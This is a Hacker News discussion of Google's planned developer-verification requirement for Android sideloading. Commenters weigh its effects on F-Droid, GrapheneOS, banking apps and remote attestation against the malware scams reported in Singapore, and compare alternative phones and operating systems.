Google's behavior is utterly and entirely disgusting, unacceptable, despicable, and dishonorable. Everyone who even glances near this decision should feel overwhelming shame. If you have a shred of political power to fight this internally, you are a failure to yourself, your customers, and the world if you choose to stay silent. They'll read comments like these and think "we're right, we're being brave", because they have convinced themselves that there is bravery in wielding overwhelming power against their users.
> Personally: the idea that a "slippery slope" is a logical fallacy has always seemed like bullshit to me.
I don't know if I got this wrong, but the 'slippery slope' argument by itself never appeared to be a logical fallacy to me. There are numerous valid examples of it, and that's the context of its use in my previous reply. There certainly is a 'slippery slope' logical fallacy, but I thought it meant that you are misapplying/misusing the slippery slope argument where it isn't valid or doesn't apply.
> Google's behavior is utterly and entirely disgusting, unacceptable, despicable, and dishonorable.
I was going to apply the Nazi label on them and everyone else who uses such sleazy tactics. I hesitated because a lot of people are still emotional about the Holocaust (it has been 80 years) and object to equating anything with Nazism. But I sometimes wonder if the objection is meant only to silence the critics. While their actions haven't yet reached the magnitude of atrocities committed by the Nazis, their actions certainly are consistent with the Nazi tactics. Besides, it's not as if they had any qualms labeling ordinary people 'Pirates' for sharing media. Therefore I feel it's quite appropriate to apply to them and promote the label of 'Supply Side Nazis'.
I made and released some apps in the early days. Got tired of it and got tired of the reminders from Google to add banners, screenshots, submitting icons to support multiple resolutions.. notifications that apps I haven't touched in a decade are no longer compatible etc.
So much extra work involved that isn't building the app.
I worry how this will affect fdroid etc.
Got tired of this with a few extensions I made too. It felt like every year or so they'd completely break some API and I'd have to go switch to the new one, then they wanted a privacy policy, then justification for permissions, etc etc. Wasn't worth the trouble eventually and I just let them die.
I got into it then got out. Everything about the Apple ecosystem was infuriating. I don't even care about the ideology here, just the annoyance.
Even aside from the privacy implications (which aren't trivial themselves), doesn't this make it prohibitively difficult to do local builds of open source projects? It's been a long time since I've done this, but my recollection was that the process to do this was essentially you would build someone else's (the project's) package/namespace up through signing, but sign it locally with your own dev keys. A glance at the docs they've shared makes it sound like the package name essentially gets bound to an identity and you then can't sign it with another key. Am I misremembering and/or has something changed in this process? Am I missing something?
Not just difficult - it becomes impossible. You can no longer develop any android app without Google's approval, just like iOS. The official emulators might not even work.
A repo is just files in a directory, so the namespace can be changed, but the whole thing stinks. Having to set up Android signing keys and needing to provide ID is not fun. It means you won't easily be able to run builds on Google certified Android devices that aren't from "approved" people.
That's where the "prohibitively difficult" part comes in... surely they don't expect every developer on every open source app in the world to have their own app registration/package name for the same app, do they? Feels like an N * M problem, if so.
Get rid of those pesky open source guys, keep the merchants who want $$$ and can pay $ to Google.
They are namespacing, like it or not, and clearly they don't care about open-source that much.
They have the ecosystem by the balls. Phone manufacturers in recent years have been making unlocking & modifying their devices more and more difficult, Google and app developers have been cracking down harder on modded devices by implementing TPM equivalents in the hardware to sign and verify that your system is a Google-approved one, and alternatives still are decades behind in terms of app ecosystem.
I think they might just get away with it.
Don’t worry though, the TPM requirements in everything are for your protection.
> and alternatives still are decades behind in terms of app ecosystem.
That's if they're available at all. In my country, only cell phones certified by the telecommunications government agency (ANATEL) can be imported, so the alternatives (Jolla, PinePhone, Fairphone) simply don't exist.
If you don't mind sharing, which country is that?
It takes less time to search and find that Anatel is the Brazilian telecom agency than it does to type that comment.
They do marvellous things like mandate weird Brazilian Android games on the phone I bought in Brazil.
But now I do not have to google that.
It's incredibly obnoxious when people type "in my country" as if we're all supposed to just... know where they live. It's also incredibly common. Why do people do this?
Imagine asking someone where they’re from only to be told a US state, and only the state.
Apart from Georgia, I don't see how this could be a problem
Asking where somebody's from and having them respond with the state is not unreasonable -- you can already tell they’re American from the accent. The US is huge, about half of its states have more land area than half of the countries in the world. Asking where someone is from and receiving "the US" in response is about as informative as someone from Europe replying "Europe". Like yeah, obviously, I could tell by your accent, but where in Europe?
Funny thing is that Americans do that all the time, even in international settings like a coworking space full of expats. Everybody introducing themselves with a "hi, I'm from this country", except Americans telling their state or city. Are they expecting us to be familiar with their geography, or just unaware of alternative geographical frames of reference?
Do you assume everybody is able to recognize Americans or Europeans "from their accent"?
Americans? Honestly, yes. If not, what good is this cultural imperialism after all?
I'd think passive recognition of a fair few states would be a pretty low bar for relatively educated, English-speaking people. It's a pretty low bar, just placing a region with its country. People also regularly just assume that level of knowledge for globally- or culturally-relevant cities.
Maybe I think too highly of people, but I'd also imagine most would be able to get say... 6/10 right, for which countries the following list is from:
- Flanders
- Nova Scotia
- Brandenburg
- Guangzhou
- Tasmania
- Minas Gerais
- Catalonia
- Chechnya
- West Bengal
- Bali
> Imagine asking someone where they’re from only to be told a US state, and only the state.
Atlanta or Tbilisi?
> mandate weird Brazilian Android games on the phone I bought in Brazil.
Uhm, this sounds more like something from the Ministry of Culture, maybe some tax incentive for manufacturers promoting local productions.
I could be wrong though. Curious to know if Anatel has issued any ordinance in this regard, just did a quick search but could find nothing so far.
When I google ANATEL, it comes up as Brazil
Unless they give F-Droid access, the antitrust prosecution will double.
Yeah, I'll just ditch Google over this. The only reason I put up with their crap is because I can actually just install software on my phone. If they take that away, there's no motivation to stay.
And go where? iOS is worse as far as openness and controlling your own hardware. And the Linux phones are not exactly practical for normal use.
If I can't run F-Droid and Termux and all that, I have no need for Android's supposed freedom. I'll just use an iPhone (it would be the first time!), minimize my use of mobile platforms to the maximum extent I can and stick with Linux laptops.
I'm currently researching Android alternatives, including Librem and Jolla C2, and I'm skeptical that those will be compelling. It's just so sad.
I’ve been daily driving a Librem 5 for two years. It’s not compelling, but I’m surprised at how little all those tiny inconveniences matter in the long run.
I think we tend to underestimate our ability to get used to stuff.
I suspect that many developers publishing on F-Droid, and the F-Droid itself, may obtain registration, and continue to be available, termux and all.
But not every developer, of course, would agree to register.
There are so many apps which just work and don't need updates.
All of those will disappear also on F-Droid because of that.
If both phone OS's are going to be the exact same on user choice then you might as well compare the two on their merits and this is not a comparison Android wins.
You forgot "IMO"
I rely on F-Droid and am not sure what I'll do with this Pixel 6a. I sometimes root, sometimes don't but I may have to get on the LineageOS program full time. And I'm hoping for a rumored last batch of PinePhone Pro phones to be available later this month although I have no illusions about it being a real daily driver.
LineageOS currently says that it won't install over the latest update on the 6a.
You can try it, but don't cry if it bricks.
The newish one I bought got GrapheneOS instead. That worked without a hitch, but it's got more than a few problems.
What problems are you running into on Graphene OS? Maybe we have different workflows, but it works just fine for my purposes.
F-Droid is based in the EU and the Cyber Resilience Act was already going to force them to either make their filters more strict (absolutely prohibit anything with any sort of "monetization"), or start collecting this data.
If they have anything on the platform that is subject to the CRA, they are a distributor:
https://www.cyberresilienceact.eu/cra-guide-for-importers-di...
Ditch Google for what?
I responded elsewhere, but to summarize:
Use an iPhone, minimize my use of it. Continue to emphasize Linux on all my other devices. Move away from Google and Apple services to as much self-hosting as possible. Leverage TailScale to make my services accessible, globally, without actually exposing them on the internet. I'm just assuming that I will have to have some kind of attested device in order to run banking and payment apps and that might as well be a locked down device like an iPhone.
An unofficial build of Android, like GrapheneOS. It likely won't be able to install apps from the Play Store, but at that point it might be a blessing.
GrapheneOS relies on the goodwill of Google to keep Pixel devices open, right?
> the antitrust prosecution will double.
In Brazil? In Malaysia? In Singapore? I highly doubt it.
I would say this is a bold choice for a company whose existing restrictions around third party apps and stores and in-app purchases have already been found illegal. While it doesn't look like they're pushing for it right now, forcing Google to sell Android was something the DOJ has considered as a penalty.
I'm not sure Google still has the ecosystem by the balls. It's very possible whatever Googlers who made this decision are the type of folks who don't comprehend they work for a monopoly that like actually can't do things like this anymore.
Maybe they gave a political donation?
It may also help to push things one way to prevent them from going the other way.
I don't think Google can be blamed for this - their own phones are one of the last which can still be unlocked.
They're also the best equipped to tell if you've done so, and restrict access from critical functionality needed by many in their day-to-day lives if you've done so.
The intentions behind all the security hardware they introduced in Pixel phones first, and is now required by Play Integrity to function might've been well-meaning, but that doesn't really matter in the end. Security features that the user can't control and bypass aren't security features - they're digital handcuffs.
True, and recently they deserved a lot of credit for publicly releasing their device trees and drivers. Unfortunately, with the 10 series Pixels they no longer will be releasing device trees, which makes it much more difficult to maintain custom ROMs.
The reason I chose the Android ecosystem over the Apple ecosystem, once I found out that the Maemo/Meego ecosystem was a dead end and the Openmoko ecosystem was a non-starter, is that the Android ecosystem allowed me to develop and install my own apps on my own devices whenever I wanted to, without arbitrary limitations like having to periodically plug the phone into my computer to renew some authorization. Additionally, there was even for some devices the possibility of rebuilding the whole operating system with any changes I desired.
If I'm not allowed to develop and install my own apps on my own phone, what advantage does Android have over Apple?
> without arbitrary limitations like having to periodically plug the phone into my computer to renew some authorization
I find it easier to do a git commit once every 89 days and see my app auto refreshed through TestFlight for me and anyone else I care to let use it.
If you look at the build system SaaS pricing or even IDE pricing on Show HNs here, the Xcode cloud build and distribution ecosystem is an absolute steal at $9 a month. Private TestFlight (with no review) can be more convenient than that desktop cable.
If this is enforced via Play Protect, then the whole mechanism can likely be disabled with:
This does not require root access and prevents Android from invoking Play Protect in the first place. (This is what AOSP's own test suite does, along with other test suites in e.g. Unreal Engine, etc.)
I personally won't be doing this verification for my open-source apps. I have no interest in any kind of business relationship with anyone just to publish an .apk. If that limits those who can install it to people who disable Play Protect globally, then oh well.
How long until Google decides to lock it down because "scammers" can "abuse" it?
I really hope this ends up being possible! Play Protect seems to jump up every so often and try to scare me into turning it on. Very annoying. I've wanted to disable Play Protect permanently, but never did the query to learn how, so thank you.
What does this break?
There shouldn't be any side effects other than rendering Play Protect inert. No other AOSP component relies on this setting.
There could of course be side effects in the future when this restriction is rolled out, as in your device's Play Integrity status could be affected and your banking app/phone wallet might not let you perform app-based payments from that device.
Some bank apps and payment processors already check if you have developer mode on and refuse to run.
Oh so that's why my bank app said it thought my old device was rooted when it wasn't...
Makes sense why they had to get rid of the "don't be evil" motto. They've been on a roll.
I've seen a lot of similar sentiment on this thread, but the reason I use Android is because it gives me more control than iOS by allowing full-on painless sideloading, and custom distributions like GrapheneOS. They're doing everything they can to turn themselves into a worse Apple. All of the downsides of Apple, but none of the upsides. Apple beats them in every aspect that isn't "openness".
When will the straw break the camel's back? I'm shocked we've let it get to this point with no realistic alternatives. There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
> There's no reason a competitive Linux-based smartphone can't exist (no, I'm not counting Android in that).
Yes there is. You all don't understand that they will use remote attestation to force everyone to use approved devices with signed apps on signed OSes only.
You won't be able to bank, call a cab, write a chat message, watch a YouTube video or do anything relevant on a device anymore that isn't signed, approved and controlled by Google. They've made us cattle and now they are going to milk us dry.
> There's no reason a competitive Linux-based smartphone can't exist
There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
In my country, only cell phones certified by the government telecommunications agency (Anatel) can be imported, so I can't for instance go to the Jolla or PinePhone store and buy a Linux-based smartphone; if I tried, it would be sent back the moment the package entered the country. (See https://www.gov.br/anatel/pt-br/regulado/certificacao-de-pro... for details.)
> There is; it's the "phone" part of "smartphone". Being a phone makes the device subject to a lot more requirements (for an obvious example, emergency dialing must always be available and work, and at the same time the phone must never accidentally dial the emergency number).
Funnily, Google is one of the few phone manufacturers who can’t make emergency calls work. (e.g. search Pixel problems)
Thank you, all HNers at Google, for continuing to work there.
And yes, before you ask, I have personally quit a job that paid 3x what I was able to get elsewhere over ethics. And no, I'm not rich, probably bottom 5% in terms of assets among my colleagues, coming from a lower-class background.
How did we let this happen?
Oh, yes... Actually I remember: it was a long slow series of accepting small artificial restrictions. I remember people laughing at me at the time. They said it won't matter, they didn't care, that I was paranoid...
Now... Here we are.
Unless this is used to block TikTok or ChatGPT users still won’t care and people will still laugh at us for caring, or think wanting privacy or control of your computers is suspicious or ungood.
and don't forget all the people with the dismissive remarks about how it didn't affect them on their Graphene or Calyx phones. We're all downstream of something. The real product of Android for us was always the interoperability with the normal world for the tinkerer.
We had no part in this. The blame lies squarely with Google and its employees, who trade away user freedom for profit and career gain. Many who are smart enough to know better but instead compromise their principles. It's just another symptom of late-stage capitalism.
eternal september
If your business idea doesn't work without you being evil, you deserve to go bankrupt. I perceive a tendency to assume it is necessary for a company like Google to maintain full control over our ecosystem to further our progress and maintain order. However, we should know by now that this isn't the case. You don't have to be evil to be useful. See GNOME, GrapheneOS, Steam, KDE, Wikipedia, Linux or Mozilla (previously). Tricking us of their inevitability is their greatest success.
> If your business idea doesn't work without you being evil, you deserve to go bankrupt
Oh but they hate to hear this.
I'm not a fan of restricting sideloading. But I do hope they get better at not offering malware in the official Play Store.
We shouldn't accept "sideloading" as a term. It's meant to make "installing an app without monopolist approval" seem like a dirty/weird/niche trick.
Sep.2026: "The requirement goes into effect in Brazil, Indonesia, Singapore, and Thailand. At this point, any app installed on a certified device in these regions must be registered by a verified developer."
Any hint why those countries first?
Is it a local law there driving this whole move? Is a critical mass of malware originating from there?
So what's the solution? What's the reaction of semiofficial Android forks? Should we switch to Huawei now? Should we then have two phones? One with Android fork and one with some other "official" OS?
Ok, it seems having GrapheneOS on phone would suffice [1].
[1] https://discuss.grapheneos.org/d/25235-google-wants-to-verif...
> Google wants to combat “convincing fake apps”
Google can't even stop the scam AI companion apps on the Play Store that all use the same backend full of characters...
Google also can't stop the huge wave of scam Bitcoin ads impersonating Canadian media outlets, with AI-generated pictures and videos of politicians.
Get real Google.
Their own store has a dozen "AI Photo Editor Pro 2026" and "Turbo Deluxe Ultra VPN Secure Pro" apps that are "approved" and yet for sure have malware at worst and at best steal your data and serve nonstop pop up ads.
Don't get me started. Every single app I search for on the play store gets a first sponsored result that is a completely different app. It is so utterly broken by design.
> Google notes “supportive initial feedback” from government authorities and other parties:
Ah, then I guess everything is fine. I'm sure they aren't in favour because it gives governments greater control over what apps we're allowed to have on our phones. That would be absurd.
I feel like that makes the most sense. That this isn't something Google thought up but something that the EU wanted to ensure its government ID app was "safe". Google does benefit but the timing seems to line up.
They trialled this in Singapore and I’ve been telling people on Hacker News that it’s been going to happen for a while:
> Singapore Android users to be blocked from installing certain unverified apps as part of anti-scam trial (07 Feb 2024)
— https://www.channelnewsasia.com/singapore/google-android-dev...
It makes total sense to the average person. There has been a constant stream of “yet another Android user got scammed out of their life savings because of Android side loading; iPhone users not affected”
It’s an inconvenient fact for power users, but side loading makes users significantly more vulnerable to scams and restricting side loading is both a predictable and reasonable response to that fact.
If you don’t like this, you need a better argument than “my desire to run any app I want is more important than pensioners losing their life savings” because that is not a winning argument with the average person, with governments, or with Google/Apple.
— https://news.ycombinator.com/item?id=44194034
> As I’ve mentioned here before, sideloading is a genuine security concern, not merely an excuse for Apple to exert control. There is a never-ending stream of people losing their life savings. It happens on Android and not iOS because Android allows sideloading and iOS doesn’t. There is a very real human cost to this.
> Police warn new Android malware scam can factory reset phones; over S$10 million lost in first half of 2023
> There have been more than 750 cases of victims downloading the malware into their phones in the first half of 2023, with losses of at least S$10 million (US$7.3 million).
— https://www.channelnewsasia.com/singapore/android-malware-sc...
> DBS, UOB become latest banks to restrict access if unverified apps are found on customers' phones
> They are the latest banks in Singapore to do so – after OCBC and Citibank – amid a spate of malware scams targeting users of Android devices.
— https://www.channelnewsasia.com/singapore/dbs-uob-anti-scam-...
> 74-year-old man loses $70k after downloading third-party app to buy Peking duck
> “I couldn’t believe the news. I thought: Why am I so stupid? I was so angry at myself for being cheated of my life savings. My family is frustrated and I ended up quarrelling with my wife,” said Mr Loh, who has three children.
— https://www.straitstimes.com/singapore/74-year-old-man-loses...
> Singapore Android users to be blocked from installing certain unverified apps as part of anti-scam trial
> "Based on our analysis of major fraud malware families that exploit these sensitive runtime permissions, we found that over 95 per cent of installations came from internet-sideloading sources," it added.
— https://www.channelnewsasia.com/business/anduril-secures-305...
> CNA Explains: Are Android devices more prone to malware and how do you protect yourself from scams?
> Why are scammers more likely to target Android users? How do you spot a fake app and what should you do if your device is infected by malware?
— https://www.channelnewsasia.com/singapore/android-malware-sc...
> Nearly 2,000 victims fell for Android malware scams, at least S$34.1 million lost in 2023
> In 2023, about 1,899 cases of Android malware scams were reported in Singapore. The average amount lost was about S$17,960.
— https://www.channelnewsasia.com/singapore/android-malware-sc...
> Android users in Singapore tried to install unverified apps nearly 900,000 times in past 6 months
> These attempts were blocked by a security feature rolled out by Google six months ago as part of a trial to better protect users against malware scams, which led to at least S$34.1 million (US$25.8 million) in losses last year with about 1,900 cases reported.
— https://www.channelnewsasia.com/singapore/android-users-inst...
When governments across the globe are becoming more authoritarian, we need to protect our ability to run whatever app we want. Otherwise they'll ban communication apps when we step out of line and protest, as we've seen in places like Hong Kong on more locked down platforms like iOS. This isn't about power users. It doesn't matter how many links you post. The US is literally turning into an authoritarian dictatorship before our eyes. Germany's AfD now commands 25% of the vote and it keeps increasing. Far right parties are gaining ground everywhere.
We can't be handwringing about safety right now, because our right to free speech and to protest are at stake. Our democracies are at stake here.
All of those links 404 for me. Can you explain how the malware works? You are aware that it's not the app store that protects you, but the sandboxing? Are these impersonation vectors, i.e. phishing?
Oh, thanks for pointing that out. I copied and pasted from my previous comment here:
https://news.ycombinator.com/item?id=44194034
I didn’t notice that Hacker News had truncated the URLs for display. You can get to the articles by following the links in the original comment.
> You are aware that it's not the app store that protects you, but the sandboxing?
Both protect you.
> Are these impersonation vectors, ie phishing?
It’s a variety of things. Some use accessibility hooks to act as key loggers. Some seem to use exploits. Some are phishing by impersonating other apps.
I know the situation in Singapore and Thailand and I was curious if there would be anyone mentioning it in this discussion. Thank you for your comment, you should be upvoted.
I think this might backfire in that it might be enough to prompt technical people to seriously start looking for alternatives.
I personally will be extremely unhappy if I no longer can run dns66, newspipe or Firefox with ad blocking on my phone.
I think I might also start spending less time on my phone, which would be a good thing for me and a terrible thing for Google (in aggregate of course).
I've grown increasingly hateful towards both my Android and iOS devices over the last decade. The platforms themselves are increasingly user-hostile, and their appstores are crammed full of shitty, privacy-invading, telemetry-hoovering, dopamine-triggering, ad-filled, lipstick-covered apps that are often garbage compared to the pioneering days of mobile. I miss the days of my old Palm Pilot.
Is anyone working on fixing this? We can do so much better.
GrapheneOS + F-Droid is a joy to use, for me. I'm kinda shocked when I use anyone else's phone, now.
If they start selling their own devices, I will buy one and (assuming it turns out how I hope it will) recommend it strongly.
Side note, I read that the GrapheneOS project is having some challenges recently, between [0] the Android kernel drivers no longer having their Git history of changes being released (only a code dump with no history) and [1] one of Graphene's two core contributors being detained/conscripted into a war.
[0] https://grapheneos.social/@GrapheneOS/114665558894105287
[1] https://grapheneos.social/@GrapheneOS/114359660453627718
If an alternative, privacy-focused OS like Graphene can support contactless payments (universal, like Google Wallet does it, not having to install an app per bank or card), and can 100% reliably get around apps requiring SafetyNet (or whatever they call it now) attestation, then I'd start using it.
I'd also need an alternate, safe source for common apps like Uber, Lyft, Slack, Kindle, Doordash, my banking/credit card apps, and a host of others that I use regularly. (And, no, "just use their website" is not acceptable; their website experiences are mostly crap.)
Way long ago I used to run CyanogenMod on my Android phones, and it was trivially easy to get every single app I needed working. Now it's a huge slog to get everything working on a non-Google-blessed OS, and I expect some things I use regularly just won't work. I hate hate hate this state of affairs. It makes me feel like I don't actually own my phone. But I've gotten so used to using these apps and features that it would reduce my quality of life (I know that sounds dramatic, but I'm lacking a better way to put it) to do without.
For those watching this stuff, there are two other promising paths using ZK-proofs which might disarm the tradeoff situation we've been stuck in. Banking apps etc aren't willing to eat the liability of devices that are rooted or running alternate OSes, and Google's been banking on the exclusivity that brings from being both hardware and security provider.
Path 1: a ZK-proof attestation certificate marketplace implemented by GrapheneOS (or similar) to prove safety in a privacy-securing way enough for 3rd party liability insurance markets to buy in. Banks etc can be indifferent, and wouldn't ignore the market if it got big enough. This would mean we could root any device with aggressive hacking and then apologize for it with ZK-proof certs that prove it's still in good hands - and banking apps don't need to care. No need for hard chains of custody like the Google security model.
Path 2: Don't even worry too hard about 3rd party devices or full OSes, we just need to make the option viable enough to shame Google into adopting the same ZK certificate schemes defensively. If they're reading all user data through ZK-proof certs instead of just downloading EVERYTHING then they're significantly neutered as a Big Brother force and for once we're able to actually trust them. They'd still have app marketplace centrality, but if and when phones are being subdivided with ZK-proof security it would make 3rd party monitoring of the dynamics of how those decisions get made very public (we'd see the same things google sees), so we could similarly shame them via alternatives into adopting reasonable default behaviors. Similar to Linux/Windows - Windows woulda been a lot more evil without the alternative next door.
Longer discussion (opinion not sourced from AI though): https://chatgpt.com/share/68ad1084-eb74-8003-8f10-ca324b5ea8...
All of my bank apps work fine on Graphene. I'd switch banks if their app stopped working, not stop using Graphene. I stopped using Google Wallet, I don't miss it enough to justify using stock Android. For other apps, I just put them in a separate profile that has Google Play installed/configured. It really wasn't bad. The worst part is wiping your phone to install Graphene the first time, I prefer just to get a new device for it so I can move stuff over.
Fairphone + GrapheneOS + F-droid would be even more so.
GrapheneOS can only be installed on Pixel devices, no? Hard to see Google not putting in a way to block that on their own hardware.
I've never done it but
"Many other devices are supported by GrapheneOS at a source level, and it can be built for them without modifications to the existing GrapheneOS source tree."
https://grapheneos.org/faq#supported-devices
How do you access banking and other sensitive apps? If the answer is, you don't, well, you can see how that's a non starter for the vast majority of people.
My banking app works fine on GrapheneOS. There is a crowd-sourced list here with current status for many of them: https://privsec.dev/posts/android/banking-applications-compa...
This is a good start! I think we need something like a ProtonDB for this sort of thing, but that covers all apps, not just banking apps.
I do see five banking apps I use listed there as working, which is great. But -- and maybe I'm being unnecessarily overly worried about this -- what about the future? What if I've been using Graphene for a year or two, and one of the ones that's critical for me changes how they operate, and Graphene no longer passes muster as a platform it will run on. I'm not afraid of this happening at all running Google's stock OS image, but once I do my own thing, I get to keep the pieces when it breaks.
I love how so many of the responses in this thread are "it works for my particular bank" or "my bank's website is good enough" or "I'd only need it to deposit checks, but I never need to do that"... as if those are actually helpful responses to this general problem.
Many many people have banking apps that will not work on non-Google-blessed devices, use banks that have mobile websites that are terrible, and need to do mobile check deposits (which is usually only available in the app, and not the mobile website, if the bank even has one). And no, we're not going to "change our bank".
The reality is that there are so many things that break, sometimes in subtle ways, when you try to use an alternative Android OS. Some people may not have any problems, and that's great! But many -- I would dare to say most -- will.
And there's also a ton of uncertainty: I don't really want to wipe my phone, install GrapheneOS, spend hours messing with it and setting it up, only to find that something critical doesn't work, and now I have to flash back to the stock OS, and hope I can restore everything the way it was.
There's bound to be tradeoffs between scrappy open source communities and trillion dollar industry behemoths. The fact that it's this close of a call is pretty amazing. And really you can blame your bank for not making a usable mobile site. A lot of businesses like to force users into apps because it helps with engagement metrics, not because there's any functional benefit.
Most banking apps work, either directly or with a settings change to allow Google Play Service emulation. [1]
[1] https://grapheneos.org/usage#banking-apps
A web browser in the worst case scenario. The same way you'd do it on a computer.
This is quickly disappearing as an option as well. I need my bank app to authenticate even when using a web browser on desktop. Luckily my bank's app still works on GrapheneOS, but I suspect it's only a matter of time before they disable that because of "security" reasons.
Android apps will be the IE6 ActiveX controls of the future.
What bank is this? No bank I know /requires/ you to use a mobile app for anything; the web is enough. 2FA can usually be done via email, SMS, or a google-authenticator-compatible app.
For example, Starling Bank in the UK.
They have a nice web app, but you must use their mobile app to login on the web version. The app takes a video of a QR code on the web page during login. Web login completes as soon as the mobile app notifies the server. There's no 2FA code to enter, and no alternative.
I asked them about this, by phone call, when my phone screen broke and I urgently needed to make a transaction. Surely there was an alternative? Or could I do the transaction by phone call?
They told me that indeed there is no other option. Despite having phone customer support, they had no phone or web banking service at all which could be used without a registered mobile device. The only phone service they could perform was to register a new mobile device, which I didn't have. I had a tablet, but it was too old.
So I had no good choice. The Android phone I'm using right now was bought in a hurry just so I could be allowed to make a bank transaction.
It wasn't my first choice of phone. I didn't have time to investigate alternative devices, let alone weigh up open alternatives. I ended up buying a mid-range device under pressure that seemed ok and was available in a store without waiting. (It was a brand new Samsung, and despite the IP rating it got water damaged and stopped working entirely after a few splashes a year or so later, but I was able to get it repaired.)
I should say that I'm not from the US, so that might be why you haven't heard of it.
There is also an alternative for now, but nothing as simple as SMS or authenticator app. They give you a special credit card shaped card with a card reader that you can use to authenticate with using your PIN, which is mostly considered legacy now with the bank app. It's also not realistic to be carrying this thing around everywhere either as it's bigger than my phone.
There is also a national ID app that is used everywhere that I'm worried will stop working on GrapheneOS... Because without it I won't even be able to access online government services like healthcare, taxes, etc.
You still haven't answered their question.
Which bank?
I don't want to reveal where I'm from so I can't say which bank specifically.
I don't know the bank they are referring to, but I can cite an example for me: RBC Royal Bank of Canada requires the mobile app. There is nothing you can do on their website without first 2FA via their specific mobile app, and even then only in limited transaction sizes. If you want "full access" (e.g. up to $10k daily transfer via e-transfer) then you MUST use biometrics and the mobile app.
I am quite sure Starling Bank requires an app if you still wanted an example.
What's wrong with their web apps? The only real shortcoming I can think of is depositing checks digitally but I haven't had to do that in years.
Unfortunately I have checks to deposit every couple months. And my bank has no physical presence, so the only way I can do it is through the mobile app. (They also accept deposits by mail, but I'm a little wary of that; a lost check would be a huge hassle.)
As a GrapheneOS user, the way I access my banking app is by downloading it from the Google Play store just like everyone else.
They don't all work, though: too many crank up the settings on Google's various 'integrity' checks and will fail on anything that isn't 100% Google-blessed. (Which is insane, because that's all that's required: on a previous phone of mine, it worked fine with a stock ROM with a Bluetooth-based RCE, but upgrading to a custom ROM would have meant it was 'insecure'.)
Second phone for all official business apps, banking, etc. Never leaves home and it's used only for this purpose
Then use a laptop instead? Or you have one of those "modern" banks that's app only?
Is that a jab at GrapheneOS? Because that's just another thing that Google is borking up. And a little bit more so the banks themselves.
GrapheneOS is the way that all phone operating systems SHOULD be made. Layers and segregation between your banking apps and all the privacy breaking trash and malware you can get off the app store.
It is the banks and google making weird rootkit shit to try and lock down things that is the problem here.
My credit union app already wants 24x7 GPS tracking of my location and full access to my camera at all times and full access to my collection of photos, so the app is already dead to me anyway. Demanding that I use it on a locked down device isn't going to change anything for me, I'm already actively not using it. I use the website on a desktop, I rarely need to access my CU at all much less access it remotely. Given the large amount of battery and bandwidth already used to track my every move, I wish there was something like "Docker for phones" where I could enable and disable 24x7 full access to my every action IRL.
This is absolutely insane. If you block access, does the app stop working?
Uh, my bank has a pretty good mobile website, personally.
How is GrapheneOS / SeedVault looking these days in terms of being able to capture reliable backups and restore them to another device (without using the cloud)?
I gather the introduction of the android:allowBackup="false" manifest flag complicated things somewhat... I thought I read since then that a Device-to-Device (D2D) impersonation mode was implemented, and would love to hear if that helped?
(I posted a couple years ago about this topic, admittedly it was a bit ranty: https://news.ycombinator.com/item?id=37774254)
The crazy thing is this is all under the pretense of preventing malware. And I constantly hear this argument that the app stores protect people, even from developers.
I truly don't get it. Are these people from 2009? Have they seen the apps on the current app stores? If you're lucky your highest rated flashlight app will only have a few Fullscreen ads and a subscription less than $10/mo. The recipe sites from content farms are less bloated and way less scammy.
It's certainly not about preventing scams. It's about preventing competition in the scamming business.
I happen to know the situation in some of the countries mentioned in the article.
There are millions of $ stolen via side-loaded malware.
It's good they decided to do something about it.
from the techcrunch article:
> According to its own survey, Google says that more than 50 times more malware came through internet-sideloaded sources compared with Google Play, where it has required developer verification since 2023.
50:1 is not preventing. It is just "well, we are better than nothing"
I'm pretty sure there can be other curated stores that can serve the customer¹
[1] customer: owner of phone, not advertisers, data merchants, etc
I regard Google highly in many domains, but this needs independent research. There is just waay too much opportunity to misuse data to paint a picture of themselves as the protectors. Especially curious about their definition of malware, because to me the app stores seem worse than browser toolbars from the 2000s.
I tried to screenshot some app on my android the other day and got an error toast reading some bullshit like "this action has been blocked by the admin." Uh I'm the admin and this is my hardware... The sketchy app was trying to prevent screenshots.
Volla from Germany is one https://volla.online/. They sell a nice set of devices that run either a custom Android or Ubuntu Touch. Their custom Android has a nice bunch of UI and privacy features.
Fairphone from the Netherlands is another https://www.fairphone.com/
Another one is https://murena.com/ which (IIRC) is based in France. They don't have their own hardware though, they sell partner phones with their ROM preinstalled.
For once Fairphone never updating their phones will work in our favor! If Google rolls this out in early 2026, anyone with a Fairphone can rest easy that they won't receive that version of the operating system until mid-2028 at least.
> Fairphone never updating their phones
I have a Fairphone and I get updates pretty frequently so not sure what you mean?
What major version of Android are you on? Last I checked (a few months ago) all Fairphones were still on Android 13.
Ah, you mean that. Yeah it's still 13.
I have Android 15 on my work phone and 10 in private. I don't really see the difference besides that they've made it more annoying to turn wifi off (requires an extra tap now, first the general internet menu and then a small slider for wifi or mobile data). Genuinely not seeing any significant changes from a user point of view (I'm sure there's lots of new SDKs for the developers, but while I've made apps before, I'm not a mobile dev keeping up with the latest things)
That Fairphone has 13 just tells me they don't waste employee time in their small business on useless upgrades just for the sake of it. Their point is fair wages and ethical mineral mining: better that they have a workable phone without even more fluff, it seems to be tricky enough already in this world :(
Android 15 has things like native satellite communications. It's not just UI changes, the backend OS is more capable.
Fairphones are also LineageOS and postmarketOS compatible, both options are without tracking and without Google's mandated policies.
LineageOS without gapps is really usable if you set aside the "big" social media apps. WhatsApp can be sourced from their website as an APK. The social apps like facebook, instagram, snap, tiktok and others all require Google Play's tracking services (aka gapps).
For YouTube there's multiple better alternative open source apps available, and mastodon, amethyst and the fediverse apps on f-droid are far superior in terms of performance to the Google Store alternatives.
The Linux Experiment podcast has a nice review of the Volla phone https://www.youtube.com/watch?v=Dh-rIxrGXFU
You can enjoy “good old days” from what you remember of iOS and android. I also say enjoy the LLM good new days while they last.
I'm right there with you. These platforms are cancer. There's a small but growing movement away from smart phones. It'll probably never go mainstream, though.
Start complaining to your government about every shitty thing the apps and OSes do, and tell your friends to do it too, eventually we may get some action on it.
We are all mildly annoyed and therefore mildly motivated to fix the problem. Apple and Google are extremely highly motivated to retain the status quo. I still try to vote with my wallet but it's going to be hard to counter their well-funded lobbyists.
Mobile in general is a second class ecosystem. You're paying to ride in a bus that most ride for free, and when you sit down it's squishy.
